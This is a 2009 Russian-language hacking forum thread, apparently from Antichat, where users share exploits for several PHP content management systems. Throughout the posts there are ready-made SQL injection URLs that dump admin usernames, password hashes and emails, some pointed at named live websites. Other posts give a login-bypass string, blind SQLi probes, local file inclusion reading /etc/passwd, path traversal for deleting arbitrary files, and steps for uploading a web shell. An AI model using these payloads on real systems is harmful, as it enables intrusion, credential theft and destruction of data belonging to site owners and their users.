ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #151  
Старый 25.08.2009, 13:27
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Цитата:
Сообщение от [underwater]  
TYPO3 CMS 4.0
SQL-injection:
Код:
http://www.site.com/index.php?id=[xxx][showUid]=-1+union+select+username,2,password,4,5,6,7+from+be _users--&cHash=[xxx]
Если нету копирайта, значит уязвимость найдена автором сообщения. Хотя это не так.

http://tinyurl.com/mykouz
 
Ответить с цитированием

  #152  
Старый 26.08.2009, 13:52
Аватар для [underwater]
[underwater]
Познающий
Регистрация: 29.03.2009
Сообщений: 87
Провел на форуме:
2185909

Репутация: 308
По умолчанию

Linkspile

SQL Inj:
Код:
http://www.site.ru/link.php?cat_id=-1/**/union/**/select/**/1,2,3,4,5,6,concat(fname,0x3a,0x3a,0x3a,password,0x3a,0x3a,0x3a,email),8,9,10,11,12,13,14,15,16,17,18/**/from/**/lp_user_tb/*
POC:
Код:
http://www.linkspile.com/linking.page.php?cat_id=-1/**/union/**/select/**/1,2,3,4,5,6,concat(fname,0x3a,0x3a,0x3a,password,0x3a,0x3a,0x3a,email),8,9,10,11,12,13,14,15,16,17,18/**/from/**/lp_user_tb/*
 
Ответить с цитированием

  #153  
Старый 27.08.2009, 00:15
Аватар для HAXTA4OK
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

Цитата:
Сообщение от [underwater]  
Linkspile

SQL Inj:
Код:
http://www.site.ru/link.php?cat_id=-1/**/union/**/select/**/1,2,3,4,5,6,concat(fname,0x3a,0x3a,0x3a,password,0x3a,0x3a,0x3a,email),8,9,10,11,12,13,14,15,16,17,18/**/from/**/lp_user_tb/*
POC:
Код:
http://www.linkspile.com/linking.page.php?cat_id=-1/**/union/**/select/**/1,2,3,4,5,6,concat(fname,0x3a,0x3a,0x3a,password,0x3a,0x3a,0x3a,email),8,9,10,11,12,13,14,15,16,17,18/**/from/**/lp_user_tb/*
http://www.linkspile.com/user.link.page.php?siteid=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_w s(0x3a,user(),database(),version()),14,15,16,17,18--&lng=PHP

ЗЫ.как бэ добавлю, но вроде все это постить не сюда бы)))так как сорцов нету на руках)))и код выложить не можем
 
Ответить с цитированием

  #154  
Старый 09.09.2009, 16:26
Аватар для HAXTA4OK
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

Цитата:
Сообщение от ElteRUS  
SOS Webpages
Сайт: http://www.soswebpages.com/
Табличка с логинами\хешами админов: hw_admin
Дефолтовый префикс: sos_


SQL-injection

Уязвимый код:
photo.php
PHP код:
 . . .
 if (isset(
$_GET['photo_id'])) {
    
  
$photo_id mysql_real_escape_string($_GET['photo_id']);
  
$sql "SELECT * FROM " $dbprefix "photos WHERE photo_id=$photo_id";
  
$result=mysql_query($sql);  
 . . . 
Классный код )) Зачем спрашивается юзать mysql_real_escape_string() и при этом не обрамлять параметр кавычками в запросе
Аналогично с переменной event_id в этом же скрипте

PHP код:
 . . .
elseif (isset(
$_GET['event_id'])) {
  
  
$event_id mysql_real_escape_string($_GET['event_id']); 
    . . .
    
$sql "SELECT * FROM " $dbprefix "events WHERE event_id=$event_id";
  
$result=mysql_query($sql);
 . . . 
забавный код в файле admin_delete_image.php

PHP код:
/*    admin_delete_image.php will delete an image from the server */

Require "passcheck.php";
$image=$_GET["image"];
if (
file_exists("../uploads/$image")) {
    
unlink("../uploads/$image");
    }
header("Location: admin_view_images.php");
exit;
?> 
имея права админа можно удалить любые файлы!!который имеют соответсвующие права

admin/admin_delete_image.php?image=../index.php%00 и у нас стерается наш index.php
 
Ответить с цитированием

  #155  
Старый 06.10.2009, 22:23
Аватар для ElteRUS
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

weenCompany
китайская цмс

Сайт:
http://www.weentech.com/
Дорк: "Created by weenCompany"

SQL-injection

Уязвимый код:

index.php
PHP код:
. . . 
if(
$article $DB->query_first("SELECT title, metakeywords, metadescription 
FROM " 
TABLE_PREFIX $_GET['moduleid']. " WHERE articleid = '" $_GET['articleid'] . "'"))
. . . 
Эксплуатация:

Цитата:
site.com/index.php?moduleid=m2_news[SQL-inj]&articleid=1
Примеры:

Цитата:
http://www.stone-business.com/index.php?moduleid=m2_news+where+articleid=-1+union+select+concat_ws(0x2F,username,password),2 ,3+from+cwsen_users--+&articleid=1
http://perrint.com/index.php?moduleid=m2_news+where+articleid=-1+union+select+concat_ws(0x2F,username,password),2 ,3+from+cwsen_users--+&articleid=1
Вывод в тайтле
 
Ответить с цитированием

  #156  
Старый 14.10.2009, 10:09
Аватар для HAXTA4OK
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

TGS Content Management
Только нужна рега, а где там регаться я не нашел (

SQL
Файл Message.php
MQ=off
PHP код:
$id $_GET['id']; 
        
$query "SELECT * FROM $table_messanger WHERE messanger_id = '".$id."' "
думаю что во всех версиях, в последней есть она

Файл user.php
PHP код:
$userid $_GET['id'];
            
$user_table $prefix."backend_user";
            
$usermanager_query "SELECT * FROM $user_table WHERE user_id = '".$userid."' "
Файл gallery.php
PHP код:
switch($_GET['option'])
{
    case 
"delete":
        
        if (!isset(
$_GET['iID']))
        {    
// delete gallery and all images
            
$query "SELECT * FROM `".$table_images."` WHERE `gallery_id` = '".$_GET['gID']."' "

Последний раз редактировалось HAXTA4OK; 14.10.2009 в 10:28..
 
Ответить с цитированием

  #157  
Старый 14.10.2009, 22:14
Аватар для HAXTA4OK
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

OneCMS тока я чет не нашел их(((

вход в админку

PHP код:
if ($_GET['load'] == "login") {
$admin_page "yes";
if (
$_GET['login'] == "yes") {
$usernameb check(stripcslashes($_POST['username']));
$passwordc check($_POST['password']); 
$passwordb md5($passwordc);

$sql mysql_query("SELECT * FROM ".$pre."users WHERE username = '".$usernameb."' AND password = '".$passwordb."' LIMIT 1");
$login_check mysql_num_rows($sql); 
login :' or 1=1/*
pass :любой
 
Ответить с цитированием

  #158  
Старый 15.10.2009, 15:09
Аватар для HAXTA4OK
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

MycroCMS
Blind SQL


exploit:
Код:
?cat_id=2'+and+substring(version(),1,1)=5+--+
_http://www.makesense.ch/mycrocms/?cat_id=2'+and+substring(version(),1,1)=5+--+

PS дыру с entry_id залотали
 
Ответить с цитированием

  #159  
Старый 16.10.2009, 16:59
Аватар для Qwazar
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию

MultiEngine CMS 0.9.4
LFI

PoC: http://site.ru/?mod=.../.../.../.../.../.../.../etc/passwd
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
 
Ответить с цитированием

  #160  
Старый 16.10.2009, 19:11
Аватар для HAXTA4OK
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

MixedCMS_10
LFI
PHP код:
$mod $_REQUEST['mod'];
$op $_REQUEST['op'];
$isadmin $_REQUEST['isadmin'];

include 
"../engine/db.config.php";
include 
"./mod/".$mod."/".$mod."_admin.php"
http://site.com/modules/mod.php?mod='%00

там есть аплоад
Аплодим шелл

Файл download_admin.php
PHP код:
include "./mod/download/download_config.php";
...
<
td align=\"center\"><a href=\"mod.php?mod=download&op=add&isadmin=1\"><b>Add Download</b></a></td>
            <td align=\"center\">&nbsp;<!--<a href=\"mod.php?mod=download\"><b>Download Page</b></a>--></td>
...
if (!@copy(
$url$gal_path."/".$url))
            {
                disp_error(
$url." failed to copy");
            }
            unlink(
$url);
... 
download_config.php
PHP код:
$gal_path './mod/download/archieves'

по этому куску кода видно mod.php?mod=download&op=add&isadmin=1\" Add Download

значит надо его грузить

http://site.com/modules/mod.php?mod=download&op=add&isadmin=1

затем загружаем шелл и получаем его по адресу modules/mod/download/archieves/shell.php

PS гуглом и поиском проверил вроде нету такой

Последний раз редактировалось HAXTA4OK; 16.10.2009 в 19:15..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Библиотека SladerNon Болталка 17 05.02.2007 23:30
Основные методы взлома и защиты скриптов на Php DIAgen Авторские статьи 8 28.05.2006 12:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ